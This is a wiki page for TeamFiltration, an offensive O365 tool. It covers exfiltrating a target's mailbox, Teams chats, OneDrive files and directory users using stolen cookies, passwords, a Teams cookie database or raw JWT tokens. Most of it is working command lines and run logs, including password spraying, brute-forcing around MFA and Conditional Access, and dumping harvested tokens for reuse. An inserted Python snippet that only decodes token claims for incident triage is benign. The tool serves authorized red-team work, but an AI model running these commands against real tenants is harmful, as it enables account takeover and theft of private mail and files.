Exfiltration

Flangvik edited this page Mar 8, 2026 · 9 revisions

Cookies + RoadTools = ❤

If you want to authenticate to your target O365 account using cookies, you must first exchange the cookies for tokens using the RoadTools Python toolkit by @_dirkjan.

Identify the ESTSAUTHPERSISTENT cookie and give it to RoadTX as shown below. This will authenticate using the cookie and retrieve a fresh set of JWT tokens. The produced tokens will be saved in the .roadtools_auth file by default.

roadtx interactiveauth --estscookie "0.AXoAqzBRR7ViQU.................<snip>"

Then feed that .roadtools_auth file into TeamFiltration:

[♥] TeamFiltration V3.5.1 PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed --config C:\config.txt --outpath C:\TeamFiltration --exfil --all --roadtools .roadtools_auth
[!] ORIGIN IP WILL BE LOGGED, are you an adult? (Y/N)
[+] Exfiltrating data from user test@example.com
[EXFIL] 01.03.2023 14:10:38 EST Exfiltrating AAD users and groups via MS AD Graph API
[EXFIL] 01.03.2023 14:10:44 EST Exfiltrating AAD users and groups via MS graph API
[EXFIL] 01.03.2023 14:10:45 EST Got 1337 AAD users, appending to database as valid users!
[EXFIL] 01.03.2023 14:10:49 EST Exfiltrating emails from Outlook!
[EXFIL] 01.03.2023 14:10:50 EST Fetched 1337 email IDs, exfiltrating content!
[EXFIL] 01.03.2023 14:10:54 EST Exfiltrating recently used contacts
[EXFIL] 01.03.2023 14:10:55 EST Exfiltrating all sent attachments from chat logs
[EXFIL] 01.03.2023 14:10:57 EST Exfiltrating all chat logs/conversations
[EXFIL] 01.03.2023 14:10:57 EST Exfiltrating shared files from OneDrive
[EXFIL] 01.03.2023 14:10:58 EST Exfiltrating the entire personal OneDrive
[EXFIL] 01.03.2023 14:11:00 EST |--> Desktop (Folder)
[EXFIL] 01.03.2023 14:11:00 EST |--> Documents (Folder)
[EXFIL] 01.03.2023 14:11:00 EST |--> Pictures (Folder)
[EXFIL] 01.03.2023 14:11:01 EST   |--> Microsoft Teams.lnk
[EXFIL] 01.03.2023 14:11:08 EST Exfiltrating 0 recent files accessible by user

Credentials

If you have credentials and simply want to use the exfiltration module, they can be supplied directly. If the login is blocked by MFA or Conditional Access, TeamFiltration will attempt to identify a gap in the policies by brute-forcing a series of login combinations, each using a unique combination of Resource URI, ClientId, and Device.

[♥] TeamFiltration VX.X.X PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed --config C:\config.txt --outpath C:\TeamFiltration --exfil --all --username dave@example.com --password Passw0rd123!

[!] ORIGIN IP WILL BE LOGGED, are you an adult? (Y/N)
[SPRAY] 01.03.2023 14:02:11 EST Sprayed dave@example.com:Passw0rd123!     => VALID NO MFA!
[SPRAY] 01.03.2023 14:02:19 EST Refreshed a token for => https://graph.microsoft.com
[SPRAY] 01.03.2023 14:02:29 EST Refreshed a token for => https://api.spaces.skype.com
[EXFIL] 01.03.2023 14:02:37 EST Cross-resource-refresh allowed, we can exfil all that things!
[SPRAY] 01.03.2023 14:02:40 EST Refreshed a token for => https://graph.windows.net
[EXFIL] 01.03.2023 14:02:46 EST Exfiltrating AAD users and groups via MS graph API
[EXFIL] 01.03.2023 14:02:47 EST Got 1337 AAD users, appending to database as valid users!
[EXFIL] 01.03.2023 14:04:07 EST Exfiltrating emails from Outlook!
[EXFIL] 01.03.2023 14:04:08 EST Fetched 1337 email IDs, exfiltrating content!
[EXFIL] 01.03.2023 14:04:14 EST Exfiltrating recently used contacts
[EXFIL] 01.03.2023 14:04:16 EST Exfiltrating all sent attachments from chat logs
[EXFIL] 01.03.2023 14:04:17 EST Exfiltrating all chat logs/conversations
[EXFIL] 01.03.2023 14:04:32 EST Exfiltrating shared files from OneDrive
[EXFIL] 01.03.2023 14:04:34 EST Exfiltrating the entire personal OneDrive
[EXFIL] 01.03.2023 14:04:36 EST |--> Desktop (Folder)
[EXFIL] 01.03.2023 14:04:36 EST |--> Documents (Folder)
[EXFIL] 01.03.2023 14:04:36 EST |--> Pictures (Folder)
[EXFIL] 01.03.2023 14:04:37 EST   |--> Microsoft Teams.lnk
[EXFIL] 01.03.2023 14:04:40 EST Exfiltrating 0 recent files accessible by user

Teams Database

If you have access to an exfiltrated Teams SQLite database (typically found at %AppData%\Microsoft\Teams\Cookies or similar), it can be provided to TeamFiltration to extract authentication cookies and tokens directly.

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --exfil --all --teams-db "C:\ExfilData\Cookies"

TeamFiltration will extract refresh tokens and session cookies from the database and use them to authenticate to the target's O365 resources.

Raw Access Tokens

You can authenticate using a single JWT access token, a comma-separated list of JWT tokens, or a path to a file containing newline-separated access tokens. These tokens are used directly as the authentication credential for exfiltration — no password or interactive login is required.

Single token:

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --exfil --all --tokens "eyJ0eXAiOiJKV1Qi..."

Comma-separated tokens:

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --exfil --all --tokens "eyJ0eXAi...,eyJ0eXAi..."

File of tokens (one per line):

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --exfil --onedrive --owa --tokens C:\tokens.txt
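For triaging a set of tokens in any of the three shapes --tokens accepts (one JWT, a comma-separated list, or a file with one token per line), for instance when such a file turns up in an incident or an engagement write-up, here is an added Python example that is not part of TeamFiltration. It decodes each token's claims without verifying the signature so a responder can see which resource (aud), which client (appid) and which user each token is bound to, and whether it has expired. The sample tokens, their dummy signature segment and the GUID-looking appids are constructed placeholders.

```python
import base64
import json
import os
import time

def _b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def load_tokens(arg: str) -> list[str]:
    """Accept the three shapes --tokens takes: one JWT, a comma-separated
    list, or a path to a file holding one token per line."""
    if os.path.isfile(arg):
        with open(arg, encoding="utf-8") as fh:
            return [ln.strip() for ln in fh if ln.strip()]
    return [t.strip() for t in arg.split(",") if t.strip()]

def decode_claims(token: str) -> dict:
    """Read the payload WITHOUT checking the signature: triage only, says nothing about validity."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS: expected header.payload.signature")
    return json.loads(_b64url_decode(parts[1]))

def summarize(token: str, now=None) -> dict:
    """Claims a responder wants first: resource (aud), client (appid), user, and expiry."""
    now = int(time.time()) if now is None else now
    c = decode_claims(token)
    return {
        "aud": c.get("aud"),
        "appid": c.get("appid"),
        "upn": c.get("upn") or c.get("unique_name"),
        "expired": int(c.get("exp", 0)) <= now,
    }

def make_sample_jwt(payload: dict) -> str:
    """Constructed sample: real JSON header/payload, dummy (unverifiable) signature segment."""
    header = _b64url_encode(json.dumps({"typ": "JWT", "alg": "RS256"}, separators=(",", ":")).encode())
    body = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header}.{body}.dummysignature"

# Constructed input in the comma-separated form; the appid GUIDs are placeholders, not real client ids.
SAMPLE_TOKENS = ",".join([
    make_sample_jwt({"aud": "https://graph.microsoft.com", "appid": "00000000-0000-0000-0000-00000000000a", "upn": "dave@example.com", "exp": 1677700000}),
    make_sample_jwt({"aud": "https://outlook.office.com", "appid": "00000000-0000-0000-0000-00000000000b", "upn": "dave@example.com", "exp": 4102444800}),
])
```

Run `summarize(t)` over `load_tokens(path_or_string)` to get one dict per token; an expired or wrong-audience token tells you where the exposure ends, a live one tells you what to revoke first.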

Dumping Gathered JWT Tokens

After a successful exfiltration session, TeamFiltration accumulates JWT tokens for multiple SSO resources (Graph, Outlook, SharePoint, OneDrive, Teams). These can be dumped to disk in JSON format using --jwt-tokens:

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --exfil --jwt-tokens

This produces a JSON file containing tokens for: MsGraph, AdGraph, Outlook, SharePoint, OneDrive, and Teams — useful for further tooling or manual API access.